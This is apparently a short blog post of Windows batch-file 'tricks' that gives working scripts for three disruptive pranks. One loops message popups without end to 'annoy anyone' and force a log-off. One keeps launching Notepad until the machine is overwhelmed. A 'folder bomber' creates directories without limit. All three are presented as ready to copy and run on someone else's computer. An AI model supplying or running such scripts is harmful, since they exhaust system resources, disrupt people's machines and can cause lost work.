Batch files

 

CONTINUOUSLY REPEAT MESSAGE 

Using this notepad trick you can annoy anyone and can actually force them to log off . This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:

  • Open Notepad.

  • Copy the below mentioned text in your notepad file:

 

@echo off
:BEGIN
msg * Welcome
msg * To
msg * HvmWeb.comyr.com
 

msg* cyber world
msg * Thanks for visiting
goto BEGIN

Open Notepad CONTINUOUSLY

Follow these steps to open Notepad continuously:

  • Open Notepad.

  • Copy the below mentioned text in your notepad file:

@echo off

:TOP

START %SystemRoot%/system32/notepad.exe

goto TOP


Folder Bomber

This batch file will create 3000+ folder in less than a minute.

Open your notepad and type the following codes

@echo off
:top
md %random%
goto top

0 comments:

Post a Comment